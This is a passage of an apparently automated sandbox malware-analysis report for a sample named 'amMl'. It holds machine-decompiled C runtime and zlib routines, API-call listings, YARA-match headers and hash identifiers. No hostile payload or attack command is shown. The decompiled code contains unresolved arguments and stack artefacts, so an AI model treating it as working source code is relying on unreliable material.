                                                                      									_t123 = LCMapStringA(_a4, _a8, _v16, _a16, _t182, _v12);
                                                                      									_v12 = _t123;
                                                                      									__eflags = _t123;
                                                                      									if(_t123 != 0) {
                                                                      										_t186 = E00417A69(_t179, _v24, _a28, _t182,  &_v12, _a20, _a24);
                                                                      										_v20 = _t186;
                                                                      										asm("sbb esi, esi");
                                                                      										_t184 =  ~_t186 & _v12;
                                                                      										__eflags = _t184;
                                                                      									} else {
                                                                      										_t184 = 0;
                                                                      									}
                                                                      									E004147AE(_t182);
                                                                      									goto L78;
                                                                      								}
                                                                      								__eflags = _t121 - 0xffffffe0;
                                                                      								if(_t121 > 0xffffffe0) {
                                                                      									goto L71;
                                                                      								}
                                                                      								_t127 =  &(_t121[4]);
                                                                      								__eflags = _t127 - 0x400;
                                                                      								if(_t127 > 0x400) {
                                                                      									_t128 = E0040B84D(0, _t179, _t182, _t127);
                                                                      									__eflags = _t128;
                                                                      									if(_t128 != 0) {
                                                                      										 *_t128 = 0xdddd;
                                                                      										_t128 = _t128 + 8;
                                                                      										__eflags = _t128;
                                                                      									}
                                                                      									_t182 = _t128;
                                                                      									goto L72;
                                                                      								}
                                                                      								E0040CFB0(_t127);
                                                                      								_t182 = _t191;
                                                                      								__eflags = _t182;
                                                                      								if(_t182 == 0) {
                                                                      									goto L62;
                                                                      								}
                                                                      								 *_t182 = 0xcccc;
                                                                      								_t182 = _t182 + 8;
                                                                      								goto L72;
                                                                      							}
                                                                      							L62:
                                                                      							_t184 = 0;
                                                                      							goto L78;
                                                                      						} else {
                                                                      							goto L58;
                                                                      						}
                                                                      					} else {
                                                                      						if(_t112 != 1) {
                                                                      							L58:
                                                                      							_t116 = 0;
                                                                      							L84:
                                                                      							return E0040CE09(_t116, 0, _v8 ^ _t188, _t179, _t182, _t184);
                                                                      						}
                                                                      						_v12 = 0;
                                                                      						if(_a28 == 0) {
                                                                      							_a28 =  *((intOrPtr*)( *_t184 + 4));
                                                                      						}
                                                                      						_t184 = MultiByteToWideChar;
                                                                      						_t182 = MultiByteToWideChar(_a28, 1 + (0 | _a32 != 0x00000000) * 8, _a12, _a16, 0, 0);
                                                                      						_t207 = _t182;
                                                                      						if(_t207 == 0) {
                                                                      							goto L58;
                                                                      						} else {
                                                                      							if(_t207 <= 0) {
                                                                      								L28:
                                                                      								_v16 = 0;
                                                                      								L29:
                                                                      								if(_v16 == 0) {
                                                                      									goto L58;
                                                                      								}
                                                                      								if(MultiByteToWideChar(_a28, 1, _a12, _a16, _v16, _t182) == 0) {
                                                                      									L52:
                                                                      									E004147AE(_v16);
                                                                      									_t116 = _v12;
                                                                      									goto L84;
                                                                      								}
                                                                      								_t184 = LCMapStringW;
                                                                      								_t174 = LCMapStringW(_a4, _a8, _v16, _t182, 0, 0);
                                                                      								_v12 = _t174;
                                                                      								if(_t174 == 0) {
                                                                      									goto L52;
                                                                      								}
                                                                      								if((_a8 & 0x00000400) == 0) {
                                                                      									__eflags = _t174;
                                                                      									if(_t174 <= 0) {
                                                                      										L44:
                                                                      										_t184 = 0;
                                                                      										__eflags = 0;
                                                                      										L45:
                                                                      										__eflags = _t184;
                                                                      										if(_t184 != 0) {
                                                                      											_t141 = LCMapStringW(_a4, _a8, _v16, _t182, _t184, _v12);
                                                                      											__eflags = _t141;
                                                                      											if(_t141 != 0) {
                                                                      												_push(0);
                                                                      												_push(0);
                                                                      												__eflags = _a24;
                                                                      												if(_a24 != 0) {
                                                                      													_push(_a24);
                                                                      													_push(_a20);
                                                                      												} else {
                                                                      													_push(0);
                                                                      													_push(0);
                                                                      												}
                                                                      												_v12 = WideCharToMultiByte(_a28, 0, _t184, _v12, ??, ??, ??, ??);
                                                                      											}
                                                                      											E004147AE(_t184);
                                                                      										}
                                                                      										goto L52;
                                                                      									}
                                                                      									_t144 = 0xffffffe0;
                                                                      									_t179 = _t144 % _t174;
                                                                      									__eflags = _t144 / _t174 - 2;
                                                                      									if(_t144 / _t174 < 2) {
                                                                      										goto L44;
                                                                      									}
                                                                      									_t52 = _t174 + 8; // 0x8
                                                                      									_t146 = _t174 + _t52;
                                                                      									__eflags = _t146 - 0x400;
                                                                      									if(_t146 > 0x400) {
                                                                      										_t147 = E0040B84D(0, _t179, _t182, _t146);
                                                                      										__eflags = _t147;
                                                                      										if(_t147 != 0) {
                                                                      											 *_t147 = 0xdddd;
                                                                      											_t147 =  &(_t147[4]);
                                                                      											__eflags = _t147;
                                                                      										}
                                                                      										_t184 = _t147;
                                                                      										goto L45;
                                                                      									}
                                                                      									E0040CFB0(_t146);
                                                                      									_t184 = _t189;
                                                                      									__eflags = _t184;
                                                                      									if(_t184 == 0) {
                                                                      										goto L52;
                                                                      									}
                                                                      									 *_t184 = 0xcccc;
                                                                      									_t184 =  &(_t184[4]);
                                                                      									goto L45;
                                                                      								}
                                                                      								if(_a24 != 0 && _t174 <= _a24) {
                                                                      									LCMapStringW(_a4, _a8, _v16, _t182, _a20, _a24);
                                                                      								}
                                                                      								goto L52;
                                                                      							}
                                                                      							_t150 = 0xffffffe0;
                                                                      							_t179 = _t150 % _t182;
                                                                      							if(_t150 / _t182 < 2) {
                                                                      								goto L28;
                                                                      							}
                                                                      							_t25 = _t182 + 8; // 0x8
                                                                      							_t152 = _t182 + _t25;
                                                                      							if(_t182 + _t25 > 0x400) {
                                                                      								_t153 = E0040B84D(0, _t179, _t182, _t152);
                                                                      								__eflags = _t153;
                                                                      								if(_t153 == 0) {
                                                                      									L27:
                                                                      									_v16 = _t153;
                                                                      									goto L29;
                                                                      								}
                                                                      								 *_t153 = 0xdddd;
                                                                      								L26:
                                                                      								_t153 =  &(_t153[4]);
                                                                      								goto L27;
                                                                      							}
                                                                      							E0040CFB0(_t152);
                                                                      							_t153 = _t189;
                                                                      							if(_t153 == 0) {
                                                                      								goto L27;
                                                                      							}
                                                                      							 *_t153 = 0xcccc;
                                                                      							goto L26;
                                                                      						}
                                                                      					}
                                                                      				}
                                                                      				_t178 = _a16;
                                                                      				_t157 = _a12;
                                                                      				while(1) {
                                                                      					_t178 = _t178 - 1;
                                                                      					if( *_t157 == 0) {
                                                                      						break;
                                                                      					}
                                                                      					_t157 =  &(_t157[1]);
                                                                      					if(_t178 != 0) {
                                                                      						continue;
                                                                      					}
                                                                      					_t178 = _t178 | 0xffffffff;
                                                                      					break;
                                                                      				}
                                                                      				_t160 = _a16 - _t178 - 1;
                                                                      				if(_t160 < _a16) {
                                                                      					_t160 = _t160 + 1;
                                                                      				}
                                                                      				_a16 = _t160;
                                                                      				goto L13;
                                                                      			}

                                                                      APIs
                                                                      • LCMapStringW.KERNEL32(00000000,00000100,00420398,00000001,00000000,00000000,7FFFFFFF,00000100,7FFFFFFF,?,?,?,?,7FFFFFFF,?,00000000), ref: 004170B3
                                                                      • GetLastError.KERNEL32(?,00000000,7FFFFFFF,00000000,?,?,00000000,00000000,7FFFFFFF,00000000,?,7FFFFFFF,00000000,00000000,?,022418A8), ref: 004170C5
                                                                      • MultiByteToWideChar.KERNEL32(7FFFFFFF,00000000,?,?,00000000,00000000,7FFFFFFF,00000100,7FFFFFFF,?,?,?,?,7FFFFFFF,?,00000000), ref: 00417151
                                                                      • _malloc.LIBCMT ref: 0041718A
                                                                      • MultiByteToWideChar.KERNEL32(?,00000001,?,?,?,00000000,?,00000000,7FFFFFFF,00000000,?,?,00000000,00000000,7FFFFFFF,00000000), ref: 004171BD
                                                                      • LCMapStringW.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,7FFFFFFF,00000000,?,?,00000000,00000000,7FFFFFFF,00000000), ref: 004171D9
                                                                      • LCMapStringW.KERNEL32(?,00000400,00000400,00000000,?,?), ref: 00417213
                                                                      • _malloc.LIBCMT ref: 0041724C
                                                                      • LCMapStringW.KERNEL32(?,00000400,00000400,00000000,00000000,?), ref: 00417277
                                                                      • WideCharToMultiByte.KERNEL32(?,00000000,00000000,?,?,?,00000000,00000000), ref: 0041729A
                                                                      • __freea.LIBCMT ref: 004172A4
                                                                      • __freea.LIBCMT ref: 004172AD
                                                                      • ___ansicp.LIBCMT ref: 004172DE
                                                                      • ___convertcp.LIBCMT ref: 00417309
                                                                      • LCMapStringA.KERNEL32(?,?,00000000,?,00000000,00000000,?,?,?,7FFFFFFF,00000100,7FFFFFFF,?,?,?,?), ref: 0041732A
                                                                      • _malloc.LIBCMT ref: 00417362
                                                                      • _memset.LIBCMT ref: 00417384
                                                                      • LCMapStringA.KERNEL32(?,?,?,?,00000000,?,?,?,?,?,?,?,7FFFFFFF,00000100,7FFFFFFF,?), ref: 0041739C
                                                                      • ___convertcp.LIBCMT ref: 004173BA
                                                                      • __freea.LIBCMT ref: 004173CF
                                                                      • LCMapStringA.KERNEL32(?,?,?,?,7FFFFFFF,00000100,7FFFFFFF,00000100,7FFFFFFF,?,?,?,?,7FFFFFFF,?,00000000), ref: 004173E9
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.366895867.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000002.00000002.366895867.0000000000426000.00000040.00000001.01000000.00000005.sdmp
                                                                      • Associated: 00000002.00000002.366895867.000000000042F000.00000040.00000001.01000000.00000005.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_400000_amMl.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: String$ByteCharMultiWide__freea_malloc$___convertcp$ErrorLast___ansicp_memset
                                                                      • String ID:
                                                                      • API String ID: 3809854901-0
                                                                      • Opcode ID: 6e0241b6e147b769e02d4c25b4a62de63cd09900d226416504aadb47099bd534
                                                                      • Instruction ID: cdfffc9a1d2b3026f9ae82d5cc8d175594050d3ba9b5f3d3ede674b9b5b9b85c
                                                                      • Opcode Fuzzy Hash: 6e0241b6e147b769e02d4c25b4a62de63cd09900d226416504aadb47099bd534
                                                                      • Instruction Fuzzy Hash: 29B1B072908119EFCF119FA0CC808EF7BB5EF48354B14856BF915A2260D7398DD2DB98
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • LCMapStringW.KERNEL32(00000000,00000100,00420398,00000001,00000000,00000000,7FFFFFFF,00000100,7FFFFFFF,?,?,?,?,7FFFFFFF,?,00000000), ref: 005C731A
                                                                      • GetLastError.KERNEL32(?,00000000,7FFFFFFF,00000000,?,?,00000000,00000000,7FFFFFFF,00000000,?,7FFFFFFF,00000000,00000000,?,00423620), ref: 005C732C
                                                                      • _malloc.LIBCMT ref: 005C73F1
                                                                      • _malloc.LIBCMT ref: 005C74B3
                                                                      • LCMapStringW.KERNEL32(?,00000400,00000400,00000000,00000000,?), ref: 005C74DE
                                                                      • WideCharToMultiByte.KERNEL32(?,00000000,00000000,?,?,?,00000000,00000000), ref: 005C7501
                                                                      • __freea.LIBCMT ref: 005C750B
                                                                      • __freea.LIBCMT ref: 005C7514
                                                                      • ___ansicp.LIBCMT ref: 005C7545
                                                                      • ___convertcp.LIBCMT ref: 005C7570
                                                                      • _malloc.LIBCMT ref: 005C75C9
                                                                      • _memset.LIBCMT ref: 005C75EB
                                                                      • ___convertcp.LIBCMT ref: 005C7621
                                                                      • __freea.LIBCMT ref: 005C7636
                                                                      • LCMapStringA.KERNEL32(?,?,?,?,7FFFFFFF,00000100,7FFFFFFF,00000100,7FFFFFFF,?,?,?,?,7FFFFFFF,?,00000000), ref: 005C7650
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.366986826.00000000005B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 005B0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_5b0000_amMl.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: String__freea_malloc$___convertcp$ByteCharErrorLastMultiWide___ansicp_memset
                                                                      • String ID:
                                                                      • API String ID: 2918745354-0
                                                                      • Opcode ID: 6e0241b6e147b769e02d4c25b4a62de63cd09900d226416504aadb47099bd534
                                                                      • Instruction ID: fb5663650938f28f1877c5980302636634b3ba0ec0522432f5f35b00d8b63732
                                                                      • Opcode Fuzzy Hash: 6e0241b6e147b769e02d4c25b4a62de63cd09900d226416504aadb47099bd534
                                                                      • Instruction Fuzzy Hash: 4BB1757280414EAFDF219FA4CC84EAE7FB5FB48354B24846DFA15A6520E7348D90DFA0
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • GetModuleHandleW.KERNEL32(KERNEL32.DLL,00421320,0000000C,005C0977,00000000,00000000,?,00000001,005BC22D,005BB993), ref: 005C084E
                                                                      • __crt_waiting_on_module_handle.LIBCMT ref: 005C0859
                                                                        • Part of subcall function 005BE9D1: Sleep.KERNEL32(000003E8,00000000,?,005C079F,KERNEL32.DLL,?,005C07EB,?,00000001,005BC22D,005BB993), ref: 005BE9DD
                                                                        • Part of subcall function 005BE9D1: GetModuleHandleW.KERNEL32(00000001,?,005C079F,KERNEL32.DLL,?,005C07EB,?,00000001,005BC22D,005BB993), ref: 005BE9E6
                                                                      • __lock.LIBCMT ref: 005C08B4
                                                                      • InterlockedIncrement.KERNEL32(?), ref: 005C08C1
                                                                      • __lock.LIBCMT ref: 005C08D5
                                                                      • ___addlocaleref.LIBCMT ref: 005C08F3
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.366986826.00000000005B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 005B0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_5b0000_amMl.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: HandleModule__lock$IncrementInterlockedSleep___addlocaleref__crt_waiting_on_module_handle
                                                                      • String ID: @.B$KERNEL32.DLL
                                                                      • API String ID: 4021795732-2520587274
                                                                      • Opcode ID: 6494f875005ce20cdce955d8c22516ac3ccd9d7187ee8c814306de8b46833c7d
                                                                      • Instruction ID: 4b54001227b2fb951f00a055caad412006aa39cbddc3904110a7f1fffb2bb380
                                                                      • Opcode Fuzzy Hash: 6494f875005ce20cdce955d8c22516ac3ccd9d7187ee8c814306de8b46833c7d
                                                                      • Instruction Fuzzy Hash: 10117571940701EED720AF75D805BDABFF0BF44310F50852EE459972E2CB74AA458F98
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • _malloc.LIBCMT ref: 005B5A45
                                                                        • Part of subcall function 005BBAB4: __FF_MSGBANNER.LIBCMT ref: 005BBAD7
                                                                        • Part of subcall function 005BBAB4: __NMSG_WRITE.LIBCMT ref: 005BBADE
                                                                      • _malloc.LIBCMT ref: 005B5AA9
                                                                      • _malloc.LIBCMT ref: 005B5B6D
                                                                      • _malloc.LIBCMT ref: 005B5B97
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.366986826.00000000005B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 005B0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_5b0000_amMl.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: _malloc
                                                                      • String ID: 1.2.3
                                                                      • API String ID: 1579825452-2310465506
                                                                      • Opcode ID: 7bb03aca1fc5991893fbdddb05e44545bf6cb9a06a6e9765b2a21d01904c984c
                                                                      • Instruction ID: 6b534ed5d3aaa3aa5b5e5eb8a29c6f1e1eed4276c3793cc4dfe3bb7879516fd7
                                                                      • Opcode Fuzzy Hash: 7bb03aca1fc5991893fbdddb05e44545bf6cb9a06a6e9765b2a21d01904c984c
                                                                      • Instruction Fuzzy Hash: 8961D3B1948B818FD7349F2988817AAFFE0FB95310F544D2EE1D683600E775B84ACB52
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 83%
                                                                      			E004057B0(intOrPtr* __eax) {
                                                                      				void* __ebx;
                                                                      				void* __edi;
                                                                      				void* __esi;
                                                                      				void* __ebp;
                                                                      				intOrPtr* _t57;
                                                                      				char* _t60;
                                                                      				char _t62;
                                                                      				intOrPtr _t63;
                                                                      				char _t64;
                                                                      				intOrPtr _t65;
                                                                      				intOrPtr _t66;
                                                                      				intOrPtr _t67;
                                                                      				intOrPtr _t69;
                                                                      				intOrPtr _t70;
                                                                      				intOrPtr _t74;
                                                                      				intOrPtr _t79;
                                                                      				intOrPtr _t82;
                                                                      				intOrPtr* _t83;
                                                                      				void* _t86;
                                                                      				char* _t88;
                                                                      				char* _t89;
                                                                      				intOrPtr* _t91;
                                                                      				intOrPtr* _t93;
                                                                      				signed int _t97;
                                                                      				signed int _t98;
                                                                      				void* _t100;
                                                                      				void* _t101;
                                                                      				void* _t102;
                                                                      				void* _t103;
                                                                      				void* _t104;
                                                                      
                                                                      				_t98 = _t97 | 0xffffffff;
                                                                      				 *((intOrPtr*)(_t100 + 0xc)) = 0;
                                                                      				_t91 = __eax;
                                                                      				 *((intOrPtr*)(_t100 + 0x10)) = _t100 + 0x10;
                                                                      				if( *((intOrPtr*)(_t100 + 0x68)) == 0 || __eax == 0) {
                                                                      					__eflags = 0;
                                                                      					return 0;
                                                                      				} else {
                                                                      					_t93 = E0040B84D(0, _t86, __eax, 0x74);
                                                                      					_t101 = _t100 + 4;
                                                                      					if(_t93 == 0) {
                                                                      						L31:
                                                                      						return 0;
                                                                      					} else {
                                                                      						 *((intOrPtr*)(_t93 + 0x20)) = 0;
                                                                      						 *((intOrPtr*)(_t93 + 0x24)) = 0;
                                                                      						 *((intOrPtr*)(_t93 + 0x28)) = 0;
                                                                      						 *((intOrPtr*)(_t93 + 0x44)) = 0;
                                                                      						 *_t93 = 0;
                                                                      						 *((intOrPtr*)(_t93 + 0x48)) = 0;
                                                                      						 *((intOrPtr*)(_t93 + 0xc)) = 0;
                                                                      						 *((intOrPtr*)(_t93 + 0x10)) = 0;
                                                                      						 *((intOrPtr*)(_t93 + 4)) = 0;
                                                                      						 *((intOrPtr*)(_t93 + 0x40)) = 0;
                                                                      						 *((intOrPtr*)(_t93 + 0x38)) = 0;
                                                                      						 *((intOrPtr*)(_t93 + 0x3c)) = 0;
                                                                      						 *((intOrPtr*)(_t93 + 0x64)) = 0;
                                                                      						 *((intOrPtr*)(_t93 + 0x68)) = 0;
                                                                      						 *(_t93 + 0x6c) = _t98;
                                                                      						 *((intOrPtr*)(_t93 + 0x4c)) = E00403080(0, 0, 0);
                                                                      						_t57 =  *((intOrPtr*)(_t101 + 0x78));
                                                                      						_t102 = _t101 + 0xc;
                                                                      						 *((intOrPtr*)(_t93 + 0x50)) = 0;
                                                                      						 *((intOrPtr*)(_t93 + 0x58)) = 0;
                                                                      						_t87 = _t57 + 1;
                                                                      						do {
                                                                      							_t82 =  *_t57;
                                                                      							_t57 = _t57 + 1;
                                                                      						} while (_t82 != 0);
                                                                      						_t60 = E0040B84D(0, _t87, _t91, _t57 - _t87 + 1);
                                                                      						_t103 = _t102 + 4;
                                                                      						 *((intOrPtr*)(_t93 + 0x54)) = _t60;
                                                                      						if(_t60 == 0) {
                                                                      							L30:
                                                                      							E00405160(0, _t87, _t93);
                                                                      							goto L31;
                                                                      						} else {
                                                                      							_t83 =  *((intOrPtr*)(_t103 + 0x6c));
                                                                      							_t88 = _t60;
                                                                      							goto L7;
                                                                      							L9:
                                                                      							L9:
                                                                      							if( *_t91 == 0x72) {
                                                                      								 *((char*)(_t93 + 0x5c)) = 0x72;
                                                                      							}
                                                                      							_t63 =  *_t91;
                                                                      							if(_t63 == 0x77 || _t63 == 0x61) {
                                                                      								 *((char*)(_t93 + 0x5c)) = 0x77;
                                                                      							}
                                                                      							_t64 =  *_t91;
                                                                      							if(_t64 < 0x30 || _t64 > 0x39) {
                                                                      								__eflags = _t64 - 0x66;
                                                                      								if(_t64 != 0x66) {
                                                                      									__eflags = _t64 - 0x68;
                                                                      									if(_t64 != 0x68) {
                                                                      										__eflags = _t64 - 0x52;
                                                                      										if(_t64 != 0x52) {
                                                                      											_t89 =  *((intOrPtr*)(_t103 + 0x14));
                                                                      											 *_t89 = _t64;
                                                                      											_t87 = _t89 + 1;
                                                                      											__eflags = _t87;
                                                                      											 *((intOrPtr*)(_t103 + 0x14)) = _t87;
                                                                      										} else {
                                                                      											 *((intOrPtr*)(_t103 + 0x10)) = 3;
                                                                      										}
                                                                      									} else {
                                                                      										 *((intOrPtr*)(_t103 + 0x10)) = 2;
                                                                      									}
                                                                      								} else {
                                                                      									 *((intOrPtr*)(_t103 + 0x10)) = 1;
                                                                      								}
                                                                      							} else {
                                                                      								_t98 = _t64 - 0x30;
                                                                      							}
                                                                      							_t91 = _t91 + 1;
                                                                      							if(_t64 == 0) {
                                                                      								goto L26;
                                                                      							}
                                                                      							_t87 = _t103 + 0x68;
                                                                      							if( *((intOrPtr*)(_t103 + 0x14)) != _t103 + 0x68) {
                                                                      								goto L9;
                                                                      							}
                                                                      							L26:
                                                                      							_t65 =  *((intOrPtr*)(_t93 + 0x5c));
                                                                      							if(_t65 == 0) {
                                                                      								goto L30;
                                                                      							} else {
                                                                      								if(_t65 != 0x77) {
                                                                      									_t66 = E0040B84D(0, _t87, _t91, 0x4000);
                                                                      									 *((intOrPtr*)(_t93 + 0x44)) = _t66;
                                                                      									 *_t93 = _t66;
                                                                      									_t67 = E004071A0(_t93, 0xfffffff1, "1.2.3", 0x38);
                                                                      									_t104 = _t103 + 0x14;
                                                                      									__eflags = _t67;
                                                                      									if(_t67 != 0) {
                                                                      										goto L30;
                                                                      									} else {
                                                                      										__eflags =  *((intOrPtr*)(_t93 + 0x44));
                                                                      										if(__eflags == 0) {
                                                                      											goto L30;
                                                                      										} else {
                                                                      											goto L34;
                                                                      										}
                                                                      									}
                                                                      								} else {
                                                                      									_push(0x38);
                                                                      									_push("1.2.3");
                                                                      									_push( *((intOrPtr*)(_t103 + 0x10)));
                                                                      									_push(8);
                                                                      									_push(0xfffffff1);
                                                                      									_push(8);
                                                                      									_push(_t98);
                                                                      									_push(_t93);
                                                                      									_t91 = E00404CE0();
                                                                      									_t79 = E0040B84D(0, _t87, _t91, 0x4000);
                                                                      									_t104 = _t103 + 0x24;
                                                                      									 *((intOrPtr*)(_t93 + 0x48)) = _t79;
                                                                      									 *((intOrPtr*)(_t93 + 0xc)) = _t79;
                                                                      									if(_t91 != 0 || _t79 == 0) {
                                                                      										goto L30;
                                                                      									} else {
                                                                      										L34:
                                                                      										 *((intOrPtr*)(_t93 + 0x10)) = 0x4000;
                                                                      										 *((intOrPtr*)(E0040BFC1(__eflags))) = 0;
                                                                      										_t69 =  *((intOrPtr*)(_t104 + 0x70));
                                                                      										__eflags = _t69;
                                                                      										_push(_t104 + 0x18);
                                                                      										if(__eflags >= 0) {
                                                                      											_push(_t69);
                                                                      											_t70 = E0040C953(0, _t87, _t91, _t93, __eflags);
                                                                      										} else {
                                                                      											_t87 =  *((intOrPtr*)(_t104 + 0x70));
                                                                      											_push( *((intOrPtr*)(_t104 + 0x70)));
                                                                      											_t70 = E0040CB9D();
                                                                      										}
                                                                      										 *((intOrPtr*)(_t93 + 0x40)) = _t70;
                                                                      										__eflags = _t70;
                                                                      										if(_t70 == 0) {
                                                                      											goto L30;
                                                                      										} else {
                                                                      											__eflags =  *((char*)(_t93 + 0x5c)) - 0x77;
                                                                      											if( *((char*)(_t93 + 0x5c)) != 0x77) {
                                                                      												E00405000(_t93, 0);
                                                                      												_push( *((intOrPtr*)(_t93 + 0x40)));
                                                                      												_t74 = E0040C8E5(0,  *((intOrPtr*)(_t93 + 0x40)), _t91, _t93, __eflags) -  *((intOrPtr*)(_t93 + 4));
                                                                      												__eflags = _t74;
                                                                      												 *((intOrPtr*)(_t93 + 0x60)) = _t74;
                                                                      												return _t93;
                                                                      											} else {
                                                                      												 *((intOrPtr*)(_t93 + 0x60)) = 0xa;
                                                                      												return _t93;
                                                                      											}
                                                                      										}
                                                                      									}
                                                                      								}
                                                                      							}
                                                                      							goto L42;
                                                                      							L7:
                                                                      							_t62 =  *_t83;
                                                                      							 *_t88 = _t62;
                                                                      							_t83 = _t83 + 1;
                                                                      							_t88 = _t88 + 1;
                                                                      							if(_t62 != 0) {
                                                                      								goto L7;
                                                                      							} else {
                                                                      								 *((char*)(_t93 + 0x5c)) = 0;
                                                                      							}
                                                                      							goto L9;
                                                                      						}
                                                                      					}
                                                                      				}
                                                                      				L42:
                                                                      			}
                                                                      0x00405870
                                                                      0x00405872
                                                                      0x00405874
                                                                      0x00405874
                                                                      0x00405877
                                                                      0x0040587b
                                                                      0x00405881
                                                                      0x00405881
                                                                      0x00405885
                                                                      0x00405889
                                                                      0x00405897
                                                                      0x00405899
                                                                      0x004058a5
                                                                      0x004058a7
                                                                      0x004058b3
                                                                      0x004058b5
                                                                      0x004058c1
                                                                      0x004058c5
                                                                      0x004058c7
                                                                      0x004058c7
                                                                      0x004058c8
                                                                      0x004058b7
                                                                      0x004058b7
                                                                      0x004058b7
                                                                      0x004058a9
                                                                      0x004058a9
                                                                      0x004058a9
                                                                      0x0040589b
                                                                      0x0040589b
                                                                      0x0040589b
                                                                      0x0040588f
                                                                      0x00405892
                                                                      0x00405892
                                                                      0x004058cc
                                                                      0x004058cf
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x004058d1
                                                                      0x004058d9
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x004058db
                                                                      0x004058db
                                                                      0x004058e0
                                                                      0x00000000
                                                                      0x004058e2
                                                                      0x004058e4
                                                                      0x00405930
                                                                      0x0040593f
                                                                      0x00405942
                                                                      0x00405944
                                                                      0x00405949
                                                                      0x0040594c
                                                                      0x0040594e
                                                                      0x00000000
                                                                      0x00405950
                                                                      0x00405950
                                                                      0x00405953
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00405953
                                                                      0x004058e6
                                                                      0x004058ea
                                                                      0x004058ec
                                                                      0x004058f1
                                                                      0x004058f2
                                                                      0x004058f4
                                                                      0x004058f6
                                                                      0x004058f8
                                                                      0x004058f9
                                                                      0x00405904
                                                                      0x00405906
                                                                      0x0040590b
                                                                      0x0040590e
                                                                      0x00405911
                                                                      0x00405916
                                                                      0x00000000
                                                                      0x00405955
                                                                      0x00405955
                                                                      0x00405955
                                                                      0x00405961
                                                                      0x00405963
                                                                      0x00405967
                                                                      0x0040596d
                                                                      0x0040596e
                                                                      0x0040597c
                                                                      0x0040597d
                                                                      0x00405970
                                                                      0x00405970
                                                                      0x00405974
                                                                      0x00405975
                                                                      0x00405975
                                                                      0x00405985
                                                                      0x00405988
                                                                      0x0040598a
                                                                      0x00000000
                                                                      0x0040598c
                                                                      0x0040598c
                                                                      0x00405990
                                                                      0x004059a5
                                                                      0x004059ad
                                                                      0x004059b6
                                                                      0x004059b6
                                                                      0x004059b9
                                                                      0x004059c5
                                                                      0x00405992
                                                                      0x00405992
                                                                      0x004059a2
                                                                      0x004059a2
                                                                      0x00405990
                                                                      0x0040598a
                                                                      0x00405916
                                                                      0x004058e4
                                                                      0x00000000
                                                                      0x00405860
                                                                      0x00405860
                                                                      0x00405862
                                                                      0x00405864
                                                                      0x00405865
                                                                      0x00405868
                                                                      0x00000000
                                                                      0x0040586a
                                                                      0x0040586a
                                                                      0x0040586d
                                                                      0x00000000
                                                                      0x00405868
                                                                      0x0040584f
                                                                      0x004057ea
                                                                      0x00000000

                                                                      APIs
                                                                      • _malloc.LIBCMT ref: 004057DE
                                                                        • Part of subcall function 0040B84D: __FF_MSGBANNER.LIBCMT ref: 0040B870
                                                                        • Part of subcall function 0040B84D: __NMSG_WRITE.LIBCMT ref: 0040B877
                                                                        • Part of subcall function 0040B84D: RtlAllocateHeap.NTDLL(00000000,-0000000E,00000001,00000000,00000000,?,00411C86,00000001,00000001,00000001,?,0040D66A,00000018,00421240,0000000C,0040D6FB), ref: 0040B8C4
                                                                      • _malloc.LIBCMT ref: 00405842
                                                                      • _malloc.LIBCMT ref: 00405906
                                                                      • _malloc.LIBCMT ref: 00405930
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.366895867.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000002.00000002.366895867.0000000000426000.00000040.00000001.01000000.00000005.sdmp
                                                                      • Associated: 00000002.00000002.366895867.000000000042F000.00000040.00000001.01000000.00000005.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_400000_amMl.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: _malloc$AllocateHeap
                                                                      • String ID: 1.2.3
                                                                      • API String ID: 680241177-2310465506
                                                                      • Opcode ID: dcd0ffeba55ff02fe10acfaeba0fa9d55be123b2b31187241ea46178cf7d6550
                                                                      • Instruction ID: 6f54ea0e5a0cddcbb7a6eab5c61130b8c10e9e343dc86a4c4a61a5a67c51a18e
                                                                      • Opcode Fuzzy Hash: dcd0ffeba55ff02fe10acfaeba0fa9d55be123b2b31187241ea46178cf7d6550
                                                                      • Instruction Fuzzy Hash: 8B61F7B1944B408FD720AF2A888066BBBE0FB45314F548D3FE5D5A3781D739D8498F5A
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.366986826.00000000005B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 005B0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_5b0000_amMl.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: _memset$__filbuf__fileno__getptd_noexit__read_memcpy_s
                                                                      • String ID:
